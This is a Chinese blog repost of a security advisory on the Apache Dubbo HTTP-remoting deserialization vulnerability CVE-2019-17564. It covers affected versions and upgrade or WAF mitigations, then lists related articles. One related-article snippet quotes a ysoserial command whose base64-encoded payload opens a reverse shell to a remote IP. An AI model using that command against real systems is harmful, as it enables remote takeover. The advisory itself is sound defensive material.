Dubbo 爆出严重漏洞!

最新推荐文章于 2024-08-11 00:15:00 发布
最新推荐文章于 2024-08-11 00:15:00 发布
阅读量2.2k 收藏
点赞数
原文链接:https://mp.weixin.qq.com/s/flzGIy5QHqs2VN_bu5__ag#rd
版权

2020年2月13日,Apache Dubbo出现了一个较为严重的漏洞:反序列化漏洞(漏洞编号:CVE-2019-17564)。

攻击者利用该漏洞,可在目标网站上远程执行恶意代码,最终导致网站被控制、数据泄露等。


一、漏洞原理

Apache Dubbo是一款应用广泛的高性能轻量级的Java 远程调用分布式服务框架,支持多种通信协议。

当网站安装了Apache Dubbo并且启用http协议进行通信时,攻击者可以向网站发送POST请求,在请求里可以执行一个反序列化的操作,由于没有任何安全校验,这个反序列化过程可以执行任意代码。

这里,序列化是指把某个编程对象转换为字节序列的过程,而反序列化是指把字节序列恢复为某个编程对象的过程。


二、影响的版本范围

漏洞影响的Apache Dubbo产品版本包括:2.7.0~2.7.4、2.6.0~2.6.7、2.5.x 的所有版本。


三、防护方案

1、Apache Dubbo官方建议用户网站升级到安全的2.7.5版本。下载地址如下:

https://github.com/apache/dubbo/tree/dubbo-2.7.5。

2、如无法快速升级版本,或希望防护更多其他漏洞,可使用各云服务器WAF内置的防护规则对该漏洞进行防护,步骤如下:

1) 购买WAF。

2) 将网站域名添加到WAF中并完成域名接入。

3) 将Web基础防护的状态设置为“拦截”模式。

你们有使用 Dubbo 的么?哪个大版本呢?

来源:https://www.toutiao.com/a6793181470287462916

END

学习资料:

分享一份最新 Java 架构师学习资料

最近热文:

1、远程办公一周,我有话说!

2、写了一首 Java 表白诗,女朋友不愁了!

3、阿里面试 Java 都问什么?万字总结!

4、Vert.x!这是目前最快的 Java 框架

5、用户密码到底要怎么加密存储?

Java干货:

1、2020 最新 Java 面试题整理,建议收藏!

2、Oracle JDK 和 OpenJDK 有什么区别?

3、Java 14 令人期待的 5 大新特性!

4、Java中的对象都是在堆上分配的吗?

5、图文并茂,傻瓜都能看懂的JVM内存布局

Spring干货:

1、Spring 事务失效的 8 大原因,吊打面试官!

2、Spring 面试 7 大问题,你顶得住不?

3、Spring Boot 之配置导入,强大到不行!

4、Spring Cloud Greenwich最后计划版本发布!

5、Spring Cloud 升级最新 Greenwich 版本

本公众号干货实在太多了,没法都搬上来,扫码关注Java技术栈公众号,获取更多最主流的 Java 技术干货。

点击「阅读原文」带你飞~

Java技术栈
关注
Vulhub靶场Dubbo Java反序列化漏洞复现
X_python321的博客
08-03 268
Apache Dubbo是一款高性能、轻量级的开源Java RPC服务框架
有关Apache dubbo反序列化漏洞的复现及思考
码农小麦
06-07 1038
有关Apache dubbo反序列化漏洞(CVE-2019-17564)网上有许多漏洞复现文章,官方漏洞描述也说的很清楚,开启了http remoting协议时,存在反序列化漏洞。本身有关java的漏洞,反序列化占了很大一部分。大概流程就是应用程序在反序列化时执行了恶意代码导致RCE(remote command/code execute)。 先来看一个自定义对象反序列化引发RCE的示例: public class SerialDemo { public static void main(String[
Dubbo,Zookeeper,NSF,Druid,CouchDB未授权访问漏洞(附带修复方法)
最新发布
C233333235的博客
08-11 826
Dubbo是阿⾥巴巴公司开源的⼀个⾼性能优秀的 服务框架,使得应⽤可通过⾼性能的 RPC实现服务的输 出和输⼊功能,可以和 Spring框架⽆缝集成。dubbo 因配置不当导致未授权访问漏洞
vulhub漏洞复现十二_dubbo
weixin_44193247的博客
01-18 2221
vulhub漏洞复现练习篇
java反序列化漏洞利用工具_Apache Dubbo 反序列化漏洞
weixin_39579468的博客
12-02 588
Apache Dubbo 反序列化漏洞早在2019年开发者社区就有谈到这个 http 协议漏洞问题,近期360灵腾安全实验室判断漏洞等级为高,利用难度低,威胁程度高。 建议升级 dubbo 版本,避免遭受黑客攻击。漏洞描述Unsafe deserialization occurs within a Dubbo application which has HTTP remoting enabled....
dubbo CVE-2019-17564 CVE-2020-1948 漏洞复现
寒星的博客
06-02 2377
简介 Apache Dubbo是一款高性能、轻量级的开源Java RPC框架,它提供了三大核心能力:面向接口的远程方法调用,智能容错和负载均衡,以及服务自动注册和发现。 CVE-2019-17564 漏洞简介 Apache Dubbo支持多种协议,官方默认为 Dubbo 协议,但是当用户选择http协议进行通信时,Apache Dubbo 在接受来自消费者的远程调用的POST请求的时候会执行一个反序列化的操作,由于没有任何安全校验,于是可以造成反序列化执行任意代码。 影响版本 2.7.0 <= Ap.
Dubbo 高危漏洞!原来都是反序列化惹得祸
楼下小黑哥
07-09 1181
前言 这周收到外部合作同事推送的一篇文章,【漏洞通告】Apache Dubbo Provider默认反序列化远程代码执行漏洞(CVE-2020-1948)通告。 按照文章披露的漏洞影响范围,可以说是当前所有的 Dubbo 的版本都有这个问题。 无独有偶,这周在 Github 自己的仓库上推送几行改动,不一会就收到 Github 安全提示,警告当前项目存在安全漏洞CVE-2018-10237。 可以看到这两个漏洞都是利用反序列化进行执行恶意代码,可能很多同学跟我当初一样,看到这个一脸懵逼。好端端的反序列化
Tomcat 又爆出高危漏洞!Tomcat 8.5 ~ 10 中招…
06-27 2620
开源界最近很热闹啊,各个主流软件或框架漏洞频发,比如像 Struts2、FastJSON、Dubbo、Redis、Tomcat 等都存在各种各样的漏洞。 不要使用含有漏洞的组件每次也都被评为 OWASP 10 大安全漏洞之一。 光这半年以来,所知道的就有 Dubbo、FastJSON、Tomcat: 前段时间这个 Tomcat AJP 协议漏洞大开,2020/06/25 这天 Tomcat 又爆出 HTTP/2 拒绝服务漏洞: http://mail-archives.apache.org/mod
Dubbo 3.0.0 来啦 !还学得动吗?
liyong1028826685的专栏
06-29 840
前言 大家好,今天给大家分享 — Dubbo 3.0.0 相关简介。首先给大家说声抱歉!因为 Dubbo 3.0.0 已经在 6月14日已经发布了最新的 release 版本,由于在做一些《Dubbo高阶教程》前期准备工作所有一直没有时间进行更新。以后如果 Dubbo 有重要的新版本发布作者会在第一时间进行相关的分享。下面就开始我们今天的内容吧! 1. Dubbo 3.0.0 简介 首先我们先来看看 Dubbo 在 Github 发布的新特性: 应用级别服务发现机制 下一代 R..
Dubbo反序列化漏洞分析集合
AS011x的博客
09-09 3785
调用相应的反序列化函数对数据流进行反序列化操作。,如果不满足则直接抛出异常。若pojo为Map实例,则从pojo(也就是一开始的第三个参数)获取key为“class”的值,并通过反射得到class所对应的类type,再判断对象的类型进行下一步处理。在之前的分析中我们知道了这个方法是用来获取数据体中的一些信息用的,其中一种利用方式就是通过在读取version的时候,调用readUTF方法,跟进。主要是通过获取tag位,进行相应的处理,但是这里关键的就是,当这里不是一个String类型的时候,将会抛出异常。
Apache Dubbo反序列化漏洞复现分析
include_voidmain的博客
03-10 3075
Apache Dubbo反序列化漏洞复现分析
Apache Dubbo(CVE-2019-17564) Java反序列化漏洞复现笔记(最详细版本)
精品博客,你值得一看~
08-25 1350
java -jar ysoserial-master-2874a69f61-1.jar CommonsCollections6 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE4NC4xMzYvODg4OCAwPiYx}|{base64,-d}|{bash,-i}" > 2.poc #生成反弹shell的脚本2.poc ,这里将刚刚复制的内容贴到双引号里面执行。
Apache Dubbo(CVE-2023-23638)POC/EXP利用工具
潇湘信安的博客
06-02 460
本工具支持CVE-2023-23638在Dubbo 3.x的完整利用,覆盖服务发现到漏洞利用及回显。在Dubbo 2.x版本也可以利用,需要自行传入服务名、方法名等。
CVE-2020-1948 Apache dubbo远程命令执行漏洞
yyj1781572的博客
04-02 1439
通过该实验了解漏洞产生的原因,掌握基本的漏洞利用及使用方法,并能给出加固方案。
dubbo使用教程(可直接应用于企业开发)
zxiaofan.com
03-20 4万+
dubbo使用教程基于zookeeper-3.4.9搭建,包含服务提供者DubboProvider、和消费者DubboConsumer,可直接在Tomcat上运行。DubboProvider对外开放2个接口,DubboConsumer调用DubboProvider,并对外暴露HTTP服务。DubboProvider还提供了对数据库的操作,基于SpringJDBC并加入了RowMapper通用类,
Dubbo详解,用心看这一篇文章就够了【重点】
热门推荐
sunnyday0426的博客
03-23 10万+
1.1 Dubbo概述 Dubbo是阿里巴巴开源的基于 Java 的高性能RPC(一种远程调用) 分布式服务框架,致力于提供高性能和透明化的RPC远程服务调用方案,以及SOA服务治理方案。 每天为2千多个服务提供大于30亿次访问量支持,并被广泛应用于阿里巴巴集团的各成员站点以及别的公司的业务中。 简单的说,Dubbo就是个服务框架,如果没有分布式的需求,其实是不需要用的,只有在分布式的时候,才有Dubbo这样的分布式服务框架的需求。 并且本质上是个远程服务调用的分布式框架(告别Web Service模式中的
Dubbo(从入门到掌握)看完这一篇就够了
西敏寺的乐章的博客
04-14 6617
Dubbo是阿里巴巴公司开源的一个高性能、轻量级的 Java RPC 框架。致力于提供高性能和透明化的 RPC 远程服务调用方案,以及 SOA 服务治理方案。
Dubbo原理和机制详解(非常全面)
mikechen的互联网架构
10-24 3万+
最全图文详解Dubbo的原理机制,彻底搞懂吃透Dubbo核心功能、Dubbo核心组件、Dubbo的架构设计、Dubbo调用流程等重要核心知识点,可以让我们更好地掌握和使用 Dubbo。。
Dubbo 2.7.6 反序列化漏洞CVE-2020-1948:远程代码执行风险
Dubbo CVE-2020-1948 是一个关于Apache Dubbo服务框架的安全漏洞,它允许远程代码执行(RCE)。Dubbo是由阿里巴巴开发的一个广泛使用的高性能分布式服务框架,它简化了服务的生产和消费过程,特别适合微服务架构。此...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值